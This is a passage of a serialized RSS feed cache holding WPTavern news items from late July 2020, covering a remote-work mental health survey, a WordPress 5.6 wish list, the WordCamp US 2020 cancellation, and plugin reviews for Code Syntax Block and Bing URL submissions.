+0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Hari Shanker R\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:36;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"WPTavern: Big Orange Heart Opens 2020 Remote Work Wellbeing and Mental Health Survey\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=102631\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:213:\"https://wptavern.com/big-orange-heart-opens-2020-remote-work-wellbeing-and-mental-health-survey?utm_source=rss&utm_medium=rss&utm_campaign=big-orange-heart-opens-2020-remote-work-wellbeing-and-mental-health-survey\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3039:\"<p>A Big Orange Heart, formerly known as WP&amp;UP, has opened its 2020 <a href=\"https://www.bigorangeheart.org/survey-2020.html\">Remote Work Wellbeing and Mental Health Survey</a>. The charity organization focuses on supporting remote working communities with education and resources for mental and physical health. It is also home to a community of more than 4,700 members who support each other in growing their businesses and building new skills.</p>\n\n\n\n<p>The survey asks fairly broad questions about your mental health and the mental health support in your work environment. It takes approximately three minutes and is completely anonymous.</p>\n\n\n\n<img />\n\n\n\n<p>Results from the 2019 survey showed that the majority of people in the WordPress community work alone and a significant percentage are dealing with anxiety and suicidal thoughts:</p>\n\n\n\n<ul><li>8% of the WordPress community have had suicidal thoughts in the last 12 months</li><li>47% stated their workplace makes them feel anxious</li><li>56% of the WordPress community works alone</li></ul>\n\n\n\n<p>Big Orange Heart founder Dan Maby believes these results are helping his team save lives. The charity is actively creating and maintaining services and a peer support network that encourage people to stay connected to their community, in order to reduce the isolation they experience. </p>\n\n\n\n<p>&ldquo;Our 2019 results identified that almost 8% of all respondents had been dealing with sustained periods of feeling suicidal over the previous 12-months, twice the national US average,&rdquo; Maby said.&nbsp;&ldquo;This finding led to more training being provided in suicide prevention and support for our team, which enabled us to support multiple individuals that have contacted us requiring suicidal support, all of whom are still with us today.&rdquo;&nbsp;&nbsp;</p>\n\n\n\n<p>There are more people working alone remotely now than ever before due to the pandemic. Spend a short time on any social media network and you will likely hear several people say they are not doing okay. This survey helps the team at Big Orange Heart understand the extent of mental health related issues within the remote working community and informs various initiatives the organization plans throughout the year. </p>\n\n\n\n<p>&ldquo;As a charity, like so many others at this time, we have been heavily impacted by the COVID-19 global crisis,&rdquo; Maby said. &ldquo;Now more than ever we need to ensure our limited resources are used in the most effective way possible. Your anonymous data will allow us to best understand how we can help improve the lives of others within our community.&rdquo;</p>\n\n\n\n<p>The <a href=\"https://www.bigorangeheart.org/survey-2020.html\">Remote Work Wellbeing and Mental Health Survey</a> runs for one month and will close on August 31st. Take the survey and check out Big Orange Heart&rsquo;s <a href=\"https://www.bigorangeheart.org/blog/\">blog</a> for several helpful posts on how to maintain your mental health while working during this crisis.</p>\n\n\n\n<p></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 01 Aug 2020 03:04:16 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:37;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"WPTavern: WordPress 5.6 Wish List: Homepage Post Type Selection and Block Management\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=102615\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:211:\"https://wptavern.com/wordpress-5-6-wish-list-homepage-post-type-selection-and-block-management?utm_source=rss&utm_medium=rss&utm_campaign=wordpress-5-6-wish-list-homepage-post-type-selection-and-block-management\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4584:\"<p class=\"has-drop-cap\">With the WordPress 5.5 development cycle coming to a close, it is time to begin mapping out what features should land in WordPress 5.6 later this year. Earlier today, Chloe Bringmann <a href=\"https://make.wordpress.org/core/2020/07/31/wordpress-5-6-whats-on-your-wishlist/\">asked the community to chime in</a> with its wish list on the Make Core blog.</p>\n\n\n\n<p>As usual, I have a few thoughts. I tend to lean toward addressing some of the long-standing developer-friendly tickets because these features allow plugin authors to build better products for end-users in the long run.</p>\n\n\n\n<p>A complete <a href=\"https://wptavern.com/open-call-for-wordpress-5-5-tickets-whats-on-your-wish-list\">custom post status API</a> tops my usual list of most-wanted features. I have already opined over this for my WordPress 5.5 wish list. It may be time for more realistic dreams. Maybe we will revisit it another year or two down the road. However, if any core leads want to give the feature a green light, I will gladly be the evangelist and get others excited about it.</p>\n\n\n\n<h2>Homepage Post Type Selection</h2>\n\n\n\n<p class=\"has-drop-cap\">For this release, I want to call out one of my other years-long wishes. WordPress should allow end-users to select any custom post type for display on the homepage.</p>\n\n\n\n<p>Imagine a WordPress where users can head to their Reading Settings screen in the admin and select something other than their normal posts list or a page to appear on the homepage. <em>Have a forum plugin installed?</em> Maybe users want to list their latest topics or forums list. <em>Running an eCommerce plugin?</em> Users should be able to display their products. <em>Setting up a web design portfolio?</em> Display the most recent projects by simply selecting this choice in the admin.</p>\n\n\n\n<p>This is an area where the software has always catered to bloggers and has avoided throwing a little love to other types of sites.</p>\n\n\n\n<p>Currently, plugin authors must perform some crazy hacks to make this work. The WooCommerce <a href=\"https://github.com/woocommerce/woocommerce/blob/master/includes/class-wc-query.php\">custom query class</a> is enough to make any developer give up. Not all of the code in that file is for the front page, but it has a frustrating amount to make something work that should be far simpler for plugin authors.</p>\n\n\n\n<p>The reason this needs to be in core WordPress is so that each and every plugin does not need to roll a custom solution. Plugins should be able to flag their post types during registration as &ldquo;allowed on homepage&rdquo; &mdash; not all post types are meant for this type of display. Then, WordPress should handle all the dirty work behind the scenes if a particular post type is selected by the end-user. The addition to the API for plugin authors would be simple, and plugins that are already hacking this feature together can drop a lot of unnecessary code.</p>\n\n\n\n<p>There is an existing <a href=\"https://core.trac.wordpress.org/ticket/19958\">8-year-old ticket</a> for the feature. It has a few old and likely outdated patches and has not seen any real activity in the past four years. Nevertheless, it would be nice to see this feature in core WordPress and finally close the ticket.</p>\n\n\n\n<h2>Block System Wish List</h2>\n\n\n\n<p class=\"has-drop-cap\">Like most releases, the block system will be getting the most attention. The things that will land in WordPress 5.6 are mostly already set in stone, assuming a particular feature does not fall behind in development like widgets and nav menus did for the 5.5 release.</p>\n\n\n\n<p>On the whole, I like the general direction the block system has been headed. If anything, I have been impatient with some things, such as awaiting the integrated <a href=\"https://wptavern.com/version-1-prototype-of-the-wordpress-admin-block-directory-announced\">block management screen</a> in the admin. For other features, such as full-site editing, I am still wondering whether they are realistic goals for the WordPress 5.6 release.</p>\n\n\n\n<p>I would take a release and focus on tightening up and polishing the existing system. Take stock of the pain points &mdash; and there are many &mdash; that users are mentioning. Spend time working on smoothing out the editing experience before tacking on new features.</p>\n\n\n\n<p>That is not going to happen. New features are what get developers up in the morning and excited about the project. Therefore, my fallback request is to bring on the block management screen.</p>\n\n\n\n<p>What&rsquo;s on your wish list?</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 31 Jul 2020 21:15:24 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:38;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"WPTavern: WordCamp US 2020 Canceled Due to Pandemic Stress and Online Event Fatigue\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=102579\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:211:\"https://wptavern.com/wordcamp-us-2020-canceled-due-to-pandemic-stress-and-online-event-fatigue?utm_source=rss&utm_medium=rss&utm_campaign=wordcamp-us-2020-canceled-due-to-pandemic-stress-and-online-event-fatigue\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:7146:\"<p><a href=\"https://2020.us.wordcamp.org/\">WordCamp US 2020</a>, which was originally scheduled for October 27-29, was officially canceled today. In April, organizers <a href=\"https://wptavern.com/wordcamp-us-2020-goes-online-cancels-in-person-event\">transitioned to planning for it to be held as a virtual event</a>, but the tenuous situation with the pandemic in the United States and the stress on the event&rsquo;s large crew of volunteers has precipitated a full cancellation. The decision was announced on the WCUS website:</p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>It is with heavy hearts that we have made the decision to cancel this year&rsquo;s WordCamp US event. In light of the continued pandemic, online event fatigue for attendees, organizers, and volunteers, and the desire for WordCamp experiences to be&nbsp;<em>traditional</em>&nbsp;WordCamp experiences, we have made the difficult decision to stop this year&rsquo;s planning, and cancel WordCamp US 2020.</p></blockquote>\n\n\n\n<p>After the pandemic started forcing WordCamps and meetups to go online, many community team members seemed to put on a brave face about adapting WordCamps to virtual events, but WCUS organizers are publicly recognizing the reality of online event fatigue. </p>\n\n\n\n<p>Angela Jin, one of the lead organizers, said her team discussed how recent online WordCamps have struggled to meet traditional goals of connecting people and encouraging contribution. In light of attendees&rsquo; increasing online conference fatigue, WCUS organizers considered the cost of volunteers&rsquo; time.</p>\n\n\n\n<p>&ldquo;The Lead Organizers also took into consideration how many volunteers we have on this team, and how much time we were asking them to invest in an event that didn&rsquo;t seem to be able to offer the same level of joy or satisfaction that an in-person WordCamp would,<strong>&ldquo;</strong> Jin said.</p>\n\n\n\n<p>&ldquo;As you might imagine, this was a very upsetting realization, but the whole team spent time discussing together, and we believe that we made the right decision.&rdquo;&nbsp;</p>\n\n\n\n<p>The U.S. passed more than 150,000 Coronavirus deaths this week and outbreaks are worsening right as schools are supposed to be opening. As COVID-19 cases continue to rise sharply in many states, renewed lockdowns and political tensions have put people on edge. Every day brings a fresh injection of bad news and the country is deeply mired in division ahead of one of the most contentious presidential elections in history. Late October is not an ideal time to try to host WordPress&rsquo; flagship WordCamp online. </p>\n\n\n\n<p>One WCUS organizer, who requested to remain anonymous, said he was angry that he invested more than 100 hours across various organizing teams and wished it had come sooner. He described how multiple personal stressors were impacting daily life and draining the team&rsquo;s energy.</p>\n\n\n\n<p>&ldquo;I feel everyone is tired and worn out,&rdquo; he said. &ldquo;They are stressed &ndash; we are all losing friends [to COVID-19]. Everyone is fighting about politics and the work suffered.&rdquo; </p>\n\n\n\n<p>He reported that many organizers were not doing their parts and all tasks were delayed. Although he experienced a high level of frustration with how it was handled, he was relieved when the decision was announced. Many of the event&rsquo;s 50 organizers are also involved in coordinating local meetups and leading other WordCamps, and their energies are spread thin.</p>\n\n\n\n<p>&ldquo;This will pave the way for something new and better,&rdquo; he said. &ldquo;We have to evolve as a community and one more zoom meeting is not it.&rdquo;</p>\n\n\n\n<p>Not all organizers considered the time invested as a loss. Cate DeRosia, who has also helped organize WordCamp Grand Rapids in the past, said the lead WCUS organizers consulted with the entire team through a multi-step process and gave opportunities for their opinions to be heard.</p>\n\n\n\n<p>&ldquo;It&rsquo;s easy to imagine that as an organizer I&rsquo;d be disappointed by this decision, but that couldn&rsquo;t be further from the truth,&rdquo; Cate DeRosia said. &ldquo;None of this is what I&rsquo;d hoped for, but the time I&rsquo;ve invested in WCUS has helped me grow relationships and learn new skills that ultimately help me further my career goals and make me a better volunteer in the future. </p>\n\n\n\n<p>&ldquo;COVID-19 has been unpredictable and made everything about life harder. By making this difficult decision now, we all get back a little of our time to invest in other areas instead of using up more energy and risking volunteer burnout for an event that ran the risk of getting lost amid other online events.&rdquo; </p>\n\n\n\n<h2>State of the Word May be Hosted as a Separate, Focused Event</h2>\n\n\n\n<p>WCUS is encouraging speakers to apply again next year. Although all regular sessions on the program were canceled, some organizers will be shifting their focus to hosting a 24-hour contributor day along with producing some workshops and youth programming content.</p>\n\n\n\n<p>Matt Mullenweg&rsquo;s annual State of the Word address is also expected to happen but will likely take a different format this year.</p>\n\n\n\n<p>&ldquo;Discussions about the State of the Word are still active; our understanding is that it will still happen, but possibly not in association with any other event,&rdquo; Jin said. </p>\n\n\n\n<p>&ldquo;I&rsquo;m really excited about the potential for lots of smaller, focused, and educational ways for the community to connect online this year,&rdquo; Matt Mullenweg said. &ldquo;For the State of the Word I don&rsquo;t have a plan yet, I think there&rsquo;s less value to us watching the same thing at the same time if we can&rsquo;t hang out afterward, but it still would be fun to celebrate the great progress we&rsquo;ve been making with some sort of video. Stay tuned November-ish.&rdquo;</p>\n\n\n\n<p>Cancellation costs for WCUS are still being finalized. Prior to making it a virtual event, the original budget was close to $1 million, with the largest costs being the venue and catering. Jin said the team will publish a full accounting of expenses on the Community Team blog or the event site after the last round of discussions with vendors are complete.</p>\n\n\n\n<p>It&rsquo;s too soon to know if the WordCamp will be an in-person event in 2021. When asked if they will be hosting in St. Louis again, Jin said that any decisions regarding WCUS 2021 are paused for now.</p>\n\n\n\n<p>&ldquo;The WCUS team did invest a lot of time and energy into this event, but in a year when it is incredibly hard to plan anything, we did the best we could and adapted quickly,&rdquo; she said. &ldquo;I&rsquo;m sad, of course, as I miss seeing everyone at WordCamps, but even if it was time and energy invested in something that didn&rsquo;t happen, I spent time doing it with brilliant people who care just as much about WordPress as I do. It&rsquo;s been an immensely challenging year, and I&rsquo;m humbled to have been a part of this team, which has consistently supported each other and grown together in the face of adversity.&rdquo;</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 31 Jul 2020 01:04:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:39;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"WPTavern: Post a Lot of Code? Try the Code Syntax Block Plugin for WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=102574\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:195:\"https://wptavern.com/post-a-lot-of-code-try-the-code-syntax-block-plugin-for-wordpress?utm_source=rss&utm_medium=rss&utm_campaign=post-a-lot-of-code-try-the-code-syntax-block-plugin-for-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2934:\"<p class=\"has-drop-cap\">I am always on the lookout for interesting syntax-highlighting plugins, particularly for those occasions when I write tutorials or other articles that lean heavily on code. Far too many plugins use shortcodes, custom blocks, or other odd solutions. However, there is one option that I intentionally overlooked when it was released over a year ago: <a href=\"https://wordpress.org/plugins/code-syntax-block/\">Code Syntax Block</a> by Marcus Kazmierczak.</p>\n\n\n\n<p>Based on the name, I assumed it was yet another standalone block. However, I have since given it another look and realized that this was note the case. It integrates directly with the core WordPress block. There are times when a new block is necessary, but this is not one of those times. Sometimes it is better to extend the existing blocks in core.</p>\n\n\n\n<p>Code Syntax Block uses the <a href=\"https://prismjs.com/\">Prism JavaScript library</a> to add syntax highlighting on the front end of the site. The plugin is designed well. It loads its scripts and styles only when the code block is in use.</p>\n\n\n\n<img />Front end PHP code example.\n\n\n\n<p>The plugin does not load Prism in the editor, so the code output will use the default editor or theme styling. This may not appeal to those who want a one-to-one match between the back and front end.  I am comfortable with  the non-highlighted version in the admin while having the <em>pretty</em> output on the front end.  However, it would be nice to see an option or filter to enable highlighting in the editor.</p>\n\n\n\n<p>Out of the box, the plugin uses the <a href=\"https://github.com/AGMStudio/prism-theme-one-dark\">One Dark</a> theme, which was created for the Atom editor and ported to Prism. Developers can overwrite the theme with either a custom <code>assets/prism/prism.css</code> file in their theme or by filtering the path or URL that gets loaded.  The Prism project has a <a href=\"https://github.com/PrismJS/prism-themes\">variety of themes</a> available that are plug-and-play.  Other themes exist outside of the official list too.</p>\n\n\n\n<p>On the admin side, the plugin creates a new &ldquo;Settings&rdquo; tab for the code block and adds a few options that users can choose from:</p>\n\n\n\n<ul><li>Language</li><li>Show line numbers</li><li>Title for code block</li></ul>\n\n\n\n<img />Editor view of Code Syntax Highlighter\n\n\n\n<p>By default, the plugin does not support the full list of over 200 languages. Instead, it lists just over 40 of the most popular. The list is filterable, so anyone can add or remove languages with a few lines of code. There is also a filter hook for setting the default languages, which would be particularly useful for those who routinely post code snippets in the same coding language.</p>\n\n\n\n<p>After a few days of testing, I can safely say that Code Syntax Block is being added to my WordPress toolbox. I wish I had only given it a shot much sooner.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 30 Jul 2020 17:30:51 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:40;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"WPTavern: Bing Launches URL Submissions Plugin for WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=102450\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:165:\"https://wptavern.com/bing-launches-url-submissions-plugin-for-wordpress?utm_source=rss&utm_medium=rss&utm_campaign=bing-launches-url-submissions-plugin-for-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5150:\"<p>Bing has <a href=\"https://blogs.bing.com/webmaster/july-2020/Get-your-WordPress-content-indexed-immediately-using-Bing-Webmaster-Tools-plugin\">launched</a> its first official <a href=\"https://wordpress.org/plugins/bing-webmaster-tools/\">plugin</a> for WordPress aimed at helping site owners get their content indexed immediately. Instead of waiting for a bingbot to crawl the site, the plugin notifies Bing of any new or updated content automatically using its <a href=\"https://www.bing.com/webmasters/url-submission-api\">Submit URL API</a>.</p>\n\n\n\n<p>&ldquo;Bing&nbsp;believes that the future for search engines is less about crawling to discover content and more about sharing new and updated content across the web, a fundamental shift in the way that search engines handle web sites,&rdquo; Bing Product Manager Fabrice Canel said. &ldquo;Instead of monitoring RSS, sitemaps and HTML pages to check for new pages, discover content changes and/or new outbound links, websites will notify search engines directly about relevant URLs changing on their website.&rdquo;</p>\n\n\n\n<p>Search engines can take anywhere from several hours to a few weeks to <a href=\"https://support.google.com/webmasters/answer/6065812?hl=en\">crawl a website</a>. Bing&rsquo;s API allows site owners to get content indexed immediately, while eventually reducing the crawling frequency for sites where there are no changes. Users will need to <a href=\"https://docs.microsoft.com/en-us/bingwebmaster/getting-access#using-api-key\">generate an API key</a> in order to configure the plugin for access to the Bing Webmaster Tools API.</p>\n\n\n\n<img />\n\n\n\n<p><br />The new plugin also introduces a few other options for managing URL submissions:</p>\n\n\n\n<ul><li>Toggle the automatic submission feature</li><li>Manually submit a URL to Bing Index</li><li>View list of recent URL submissions from the plugin</li><li>Retry any failed submissions from the recent submissions list</li><li>Download recent URL submissions for analysis</li></ul>\n\n\n\n<p>Canel said the Bing Webmaster Team recommends using the new URL Submissions plugin as a complement to existing plugins that connect sites to Bing, such as <a href=\"https://jetpack.com/support/site-verification-tools/\">Jetpack&rsquo;s site verification tool</a>, and <a href=\"https://wordpress.org/plugins/search/SEO/\">SEO plugins</a> that add XML sitemaps. Bing&rsquo;s plugin is different in that it focuses on enabling Bing to discover immediate changes on WordPress sites.</p>\n\n\n\n<p>&ldquo;Sitemaps are a great complementary solution to our plugin to discover all URLs on WordPress sites, but we cannot monitor each sitemap all the time,&rdquo; Canel said. &ldquo;Only a small percentage of WordPress sites are publishing content every day. Most are nearly static and this is preferable to be notified instead of pulling content every so often for them. Same for sites publishing often, it helps to get the content quickly indexed instead of having to wait a long time.&rdquo;</p>\n\n\n\n<p>Bing doesn&rsquo;t usually get as much airtime as Google and its supporting tools, since Google continues to dominate the search market. Bing&rsquo;s market share is currently <a href=\"https://gs.statcounter.com/search-engine-market-share/\">hovering at 2.75%</a> of searches globally on all platforms as of June 2020. </p>\n\n\n\n<div id=\"all-search_engine-ww-monthly-201906-202006\" width=\"600\" height=\"400\"></div><!-- You may change the values of width and height above to resize the chart --><p>Source: <a href=\"https://gs.statcounter.com/search-engine-market-share\">StatCounter Global Stats &ndash; Search Engine Market Share</a></p>\n\n\n\n<p>The search engine has seen slow but steady growth in certain regions and platforms. Bing performs higher globally across desktop searches (6.08%).  In the United Sates, Bing&rsquo;s market share is sitting at 6.99% and is even higher on US desktop searches (13.35%):</p>\n\n\n\n<table><tbody><tr><th>Google</th><td>87.71%</td></tr><tr><th>bing</th><td>6.99%</td></tr><tr><th>Yahoo!</th><td>3.44%</td></tr></tbody></table><a href=\"https://gs.statcounter.com/search-engine-market-share/\">Search Engine Market Share in US &ndash; June 2020</a>\n\n\n\n<p>Bing may not boast a big slice of the search market pie, but the search engine served close to <a href=\"https://www.statista.com/statistics/752270/range-of-bingcom-based-on-unique-visitors/\">936.5 million</a> unique global visitors during the month of May 2020. More than half of Bing users have a bachelor&rsquo;s or post graduate degree and <a href=\"https://www.statista.com/statistics/742834/usa-bing-audience-share-by-income/\">38% of Bing users</a> have an income of $100,000 USD or higher. Depending on the demographic you are targeting, being found by Bing users may be one small factor in your site&rsquo;s overall success. </p>\n\n\n\n<p>The search engine recently updated its <a href=\"https://www.bing.com/webmaster/help/webmaster-guidelines-30fba23a\">webmaster guidelines</a> for the first time since 2012. If you&rsquo;re looking to optimize for Bing&rsquo;s audience, this document contains a detailed break down of how the search engine ranks content. </p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 29 Jul 2020 23:49:13 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:41;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:89:\"WPTavern: Upcoming in WordPress 5.5: Features and Changes Theme Authors Should Know About\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=102535\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:221:\"https://wptavern.com/upcoming-in-wordpress-5-5-features-and-changes-theme-authors-should-know-about?utm_source=rss&utm_medium=rss&utm_campaign=upcoming-in-wordpress-5-5-features-and-changes-theme-authors-should-know-about\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:8147:\"<p class=\"has-drop-cap\">August 11, the target release date for WordPress 5.5, is just shy of two weeks away. For developers who have not been completely on top of the upcoming release, now is a good time to start looking at how changes might affect their projects. Theme authors in particular can expect several new features and some 